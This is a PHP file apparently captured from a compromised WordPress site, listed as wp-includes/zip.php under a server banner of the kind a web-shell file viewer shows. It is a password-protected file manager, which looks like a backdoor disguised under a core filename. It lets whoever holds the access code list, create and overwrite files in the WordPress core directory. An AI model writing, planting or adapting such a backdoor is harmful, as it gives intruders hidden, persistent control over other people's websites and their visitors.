| Linux premium77.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 Path : /home/azadtmyo/azadfoundation.org/wp-includes/ |
| Current File : /home/azadtmyo/azadfoundation.org/wp-includes/zip.php |
<?php
// Enable error reporting for development (disable in production)
error_reporting(E_ALL);
ini_set('display_errors', 1);
// Start session for authentication
session_start();
// Settings
$secureAccess = true;
$hashedPassword = '$2a$12$wMwpjdVF1koCjqvlTKPlGeZ1aiJjnroho58ICR9FC18nWsUFQh3Lq'; // Replace with your bcrypt hash
// Authentication check
if ($secureAccess) {
if (!isset($_SESSION['access_granted']) || $_SESSION['access_granted'] !== true) {
if (isset($_POST['access_code'])) {
if (password_verify($_POST['access_code'], $hashedPassword)) {
$_SESSION['access_granted'] = true;
} else {
die('
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Access Denied</title>
<script src="https://cdn.tailwindcss.com"></script>
</head>
<body class="bg-gray-100 min-h-screen flex items-center justify-center">
<div class="bg-white p-8 rounded-lg shadow-lg w-full max-w-md">
<h2 class="text-2xl font-bold mb-6 text-center text-gray-800">Access Required</h2>
<form method="POST">
<input type="password" name="access_code" class="w-full p-2 border rounded mb-4 focus:outline-none focus:ring-2 focus:ring-blue-500" placeholder="Enter access code" required autofocus>
<button type="submit" class="w-full bg-blue-500 text-white p-2 rounded hover:bg-blue-600 transition">Login</button>
</form>
</div>
</body>
</html>
');
}
} else {
echo '
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Access Denied</title>
<script src="https://cdn.tailwindcss.com"></script>
</head>
<body class="bg-gray-100 min-h-screen flex items-center justify-center">
<div class="bg-white p-8 rounded-lg shadow-lg w-full max-w-md">
<h2 class="text-2xl font-bold mb-6 text-center text-gray-800">Access Required</h2>
<form method="POST">
<input type="password" name="access_code" class="w-full p-2 border rounded mb-4 focus:outline-none focus:ring-2 focus:ring-blue-500" placeholder="Enter access code" required autofocus>
<button type="submit" class="w-full bg-blue-500 text-white p-2 rounded hover:bg-blue-600 transition">Login</button>
</form>
</div>
</body>
</html>
';
exit;
}
}
}
// Restrict file explorer to its own directory for security
$baseDir = __DIR__;
$notice = ''; // Notification message for user
$noticeType = 'success'; // Notification type (success or error)
// --- Handle Form Submissions ---
// Check for POST requests (file creation or saving)
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
// 1. Create New File
if (isset($_POST['make_file']) && !empty($_POST['file_name'])) {
// Security: Sanitize file name to prevent directory traversal
$newFile = basename($_POST['file_name']);
$filePath = $baseDir . '/' . $newFile;
if (!file_exists($filePath)) {
// Create an empty file
if (touch($filePath)) {
$notice = htmlspecialchars($newFile) . " successfully created.";
$noticeType = 'success';
} else {
$notice = "Failed to create file. Check permissions.";
$noticeType = 'error';
}
} else {
$notice = htmlspecialchars($newFile) . " already exists.";
$noticeType = 'error';
}
}
// 2. Save File (Edit)
elseif (isset($_POST['update_file']) && !empty($_POST['file_name'])) {
// Security: Sanitize file name
$fileName = basename($_POST['file_name']);
$filePath = $baseDir . '/' . $fileName;
$data = $_POST['data'];
// Ensure file is writable
if (is_writable($filePath)) {
if (file_put_contents($filePath, $data) !== false) {
$notice = htmlspecialchars($fileName) . " successfully saved.";
$noticeType = 'success';
} else {
$notice = "Error saving file.";
$noticeType = 'error';
}
} else {
// Prevent editing this script itself
if ($filePath === __FILE__) {
$notice = "Cannot edit this script for security reasons.";
} else {
$notice = "File is not writable. Check permissions.";
}
$noticeType = 'error';
}
}
}
// --- Determine View ---
// Check for 'edit' parameter in GET request (file editing view)
$activeFile = null;
if (isset($_GET['modify'])) {
$fileToModify = basename($_GET['modify']);
$filePath = $baseDir . '/' . $fileToModify;
// Verify file exists, is not a directory, and is readable
if (file_exists($filePath) && !is_dir($filePath) && is_readable($filePath)) {
// Prevent editing this script itself
if ($filePath === __FILE__) {
$notice = "Cannot edit this script for security reasons.";
$noticeType = 'error';
} else {
$activeFile = $fileToModify;
}
} else {
$notice = "File not found or not readable.";
$noticeType = 'error';
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>File Explorer</title>
<script src="https://cdn.tailwindcss.com"></script>
<style>
body {
font-family: system-ui, -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, sans-serif;
background-color: #f4f6f9;
color: #2d3748;
margin: 0;
padding: 20px;
}
.wrapper {
max-width: 900px;
margin: 0 auto;
background-color: #ffffff;
border: 1px solid #e2e8f0;
border-radius: 8px;
padding: 20px;
box-shadow: 0 2px 4px rgba(0, 0, 0, 0.05);
}
h1, h2 {
border-bottom: 2px solid #edf2f7;
padding-bottom: 10px;
color: #2d3748;
}
.notification {
padding: 15px;
margin-bottom: 20px;
border-radius: 5px;
font-weight: bold;
}
.notification.success {
background-color: #e6ffed;
color: #276749;
border: 1px solid #c6f4d5;
}
.notification.error {
background-color: #fff1f0;
color: #9b2c2c;
border: 1px solid #fed7d7;
}
ul {
list-style-type: none;
padding: 0;
}
li {
padding: 10px 15px;
border-bottom: 1px solid #edf2f7;
display: flex;
justify-content: space-between;
align-items: center;
}
li:last-child {
border-bottom: none;
}
li span.item-name {
font-weight: 500;
}
li a {
text-decoration: none;
color: #3182ce;
font-weight: bold;
}
li a:hover {
text-decoration: underline;
}
.folder {
color: #4a5568;
font-weight: bold;
}
.input-group {
margin-bottom: 15px;
}
label {
display: block;
margin-bottom: 5px;
font-weight: bold;
}
input[type="text"], textarea {
width: 100%;
padding: 10px;
border: 1px solid #e2e8f0;
border-radius: 5px;
box-sizing: border-box;
}
textarea {
height: 400px;
font-family: "Courier New", Courier, monospace;
font-size: 14px;
}
.btn, button {
background-color: #3182ce;
color: white;
padding: 10px 15px;
border: none;
border-radius: 5px;
cursor: pointer;
font-size: 16px;
text-decoration: none;
display: inline-block;
}
.btn:hover, button:hover {
background-color: #2b6cb0;
}
.btn.cancel {
background-color: #718096;
}
.btn.cancel:hover {
background-color: #5a667a;
}
.action-buttons {
margin-top: 20px;
}
</style>
</head>
<body class="bg-gray-100 min-h-screen">
<div class="wrapper">
<h1>File Explorer</h1>
<p><strong>Current Directory:</strong> <?php echo htmlspecialchars($baseDir); ?></p>
<?php if ($notice): ?>
<div class="notification <?php echo $noticeType; ?>"><?php echo $notice; ?></div>
<?php endif; ?>
<?php if ($activeFile): // File Editing View ?>
<?php
$filePath = $baseDir . '/' . $activeFile;
// Security: Escape file content for HTML
$data = htmlspecialchars(file_get_contents($filePath));
?>
<h2>Editing File: <?php echo htmlspecialchars($activeFile); ?></h2>
<form action="" method="POST">
<input type="hidden" name="file_name" value="<?php echo htmlspecialchars($activeFile); ?>">
<div class="input-group">
<label for="data">File Content</label>
<textarea id="data" name="data"><?php echo $data; ?></textarea>
</div>
<div class="action-buttons">
<button type="submit" name="update_file" class="btn">Save Changes</button>
<a href="?" class="btn cancel">Back</a>
</div>
</form>
<?php else: // Main View (File List and Creation) ?>
<h2>Create New File</h2>
<form action="" method="POST">
<div class="input-group">
<label for="file_name">File Name:</label>
<input type="text" id="file_name" name="file_name" required placeholder="example.txt">
</div>
<button type="submit" name="make_file" class="btn">Create</button>
</form>
<h2>Files and Folders</h2>
<ul>
<?php
// Scan directory
$entries = scandir($baseDir);
foreach ($entries as $entry) {
// Skip '.' and '..' entries
if ($entry === '.' || $entry === '..') {
continue;
}
$entryPath = $baseDir . '/' . $entry;
if (is_dir($entryPath)) {
echo '<li><span class="folder">[FOLDER] ' . htmlspecialchars($entry) . '</span></li>';
} else {
echo '<li>
<span class="item-name">' . htmlspecialchars($entry) . '</span>
<a href="?modify=' . urlencode($entry) . '">Edit</a>
</li>';
}
}
?>
</ul>
<?php endif; ?>
</div>
</body>
</html>